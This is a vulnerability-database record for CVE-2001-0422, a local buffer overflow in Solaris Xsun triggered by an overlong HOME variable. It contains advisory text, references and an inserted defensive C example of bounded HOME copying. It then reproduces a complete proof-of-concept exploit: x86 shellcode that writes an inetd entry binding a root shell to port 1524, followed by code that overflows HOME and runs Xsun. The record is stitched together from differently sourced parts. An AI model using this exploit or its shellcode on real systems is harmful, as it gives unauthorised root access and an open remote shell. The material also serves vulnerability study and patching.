Solaris Xsun Buffer Overflow Vulnerability

Vulnerability ID: 1106288    Vulnerability type: Buffer overflow
Published: 2001-04-10    Updated: 2005-05-02
CVE: CVE-2001-0422    CNNVD ID: CNNVD-200107-007
Platform: Solaris    CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/20743
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-007
|Vulnerability details
Xsun in Solaris 8 and earlier contains a buffer overflow vulnerability. A local user can execute arbitrary commands by way of an overlong HOME environment variable.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/2561/info

The X11 server that ships with Sun Microsystems' Solaris, Xsun, contains a locally exploitable buffer overflow vulnerability.

The condition is present when the value of the HOME environment variable is of excessive length (more than 1050 bytes long).

An attacker may exploit this vulnerability to execute arbitrary code with effective group 'root' privileges.
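The root cause described above is a fixed-size buffer receiving an environment value of attacker-controlled length. The following C example is an added illustration for this record, not part of the original advisory or of Sun's Xsun code: it shows how a setgid program should read HOME, refusing (rather than truncating) a value that does not fit its buffer. The cap HOME_MAX and the helper names are assumptions chosen for the example; the advisory's 1050-byte figure is used only to motivate the limit.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen, setenv, unsetenv */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed cap for this example: the advisory states the overflow is triggered
 * by a HOME value longer than about 1050 bytes, so a smaller, explicit limit
 * is enforced before any copy takes place. */
#define HOME_MAX 1024

/* Copy environment variable `name` into dst (capacity dstlen) only if it is
 * present and fits, including the terminating NUL.
 * Returns the copied length on success, -1 if the variable is unset, and -2 if
 * it is too long. On -2 nothing is written, so the caller cannot silently
 * continue with a truncated path. */
long env_copy_bounded(const char *name, char *dst, size_t dstlen)
{
    const char *val = getenv(name);
    if (val == NULL)
        return -1;
    size_t len = strnlen(val, dstlen);   /* never scans past dstlen bytes */
    if (len >= dstlen)
        return -2;                       /* would overflow, or leave no room for NUL */
    memcpy(dst, val, len + 1);
    return (long)len;
}

/* The HOME case from the advisory, with the example's fixed cap. */
long read_home(char *dst, size_t dstlen)
{
    return env_copy_bounded("HOME", dst, dstlen);
}

/* Exercises the three outcomes with constructed values: a normal path, an
 * over-long value (rejected, not truncated), and an unset variable.
 * Returns 1 when every case behaves as documented, 0 otherwise. */
int run_checks(void)
{
    char small[16];
    char big[HOME_MAX + 100];            /* constructed over-long value */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    if (setenv("HOME", "/home/alice", 1) != 0) return 0;
    if (read_home(small, sizeof small) != 11) return 0;
    if (strcmp(small, "/home/alice") != 0) return 0;

    if (setenv("HOME", big, 1) != 0) return 0;
    if (read_home(small, sizeof small) != -2) return 0;

    if (unsetenv("HOME") != 0) return 0;
    if (read_home(small, sizeof small) != -1) return 0;
    return 1;
}

int main(void)
{
    char home[HOME_MAX];
    long rc = read_home(home, sizeof home);
    if (rc < 0) {
        fprintf(stderr, "HOME %s; refusing to continue\n",
                rc == -1 ? "is unset" : "is too long");
        return 1;
    }
    printf("HOME=%s (%ld bytes)\n", home, rc);
    return run_checks() ? 0 : 2;
}
```

Rejecting an over-long value outright is the important design choice: a truncating copy (strncpy into the buffer) would stop the overflow but could still hand the program a path it never intended to use, which matters when the program runs with elevated group privileges as Xsun does.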

/***********************************/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow

Proof of Concept Exploitation
riley@eeye.com

Puts a Root shell on local port 1524
/***********************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFLEN  1041

/* seteuid/setuid/inetd shell */
char eyecode[] =
"\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
"\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
"\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
"\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
"\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
"\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
"\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
"\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
"\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;"
"/usr/sbin/inetd -s /tmp/eeye2001";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp()
{__asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
	int i;
	if (argc > 1)
		offset = strtol(argv[1], NULL, 0);
	else
		offset = -200;
	esp = get_esp();
	memset(buf, 0x90, BUFLEN);
	memcpy(buf+800, eyecode, strlen(eyecode));
	*((int *) &buf[1037]) = esp+offset;
	strncpy(&buf[0],"HOME=",5);
	putenv(buf);
	execl("/usr/openwin/bin/Xsun", "eEye", ":1", (char *)NULL);
	return 0;
}
|References

Source: BID
Name: 2561
Link: http://www.securityfocus.com/bid/2561
Source: BUGTRAQ
Name: 20010410 Solaris Xsun buffer overflow vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2001-04/0158.html
Source: XF
Name: solaris-xsun-home-bo(6343)
Link: http://xforce.iss.net/static/6343.php
Source: US Government Resource: oval:org.mitre.oval:def:555
Name: oval:org.mitre.oval:def:555
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:555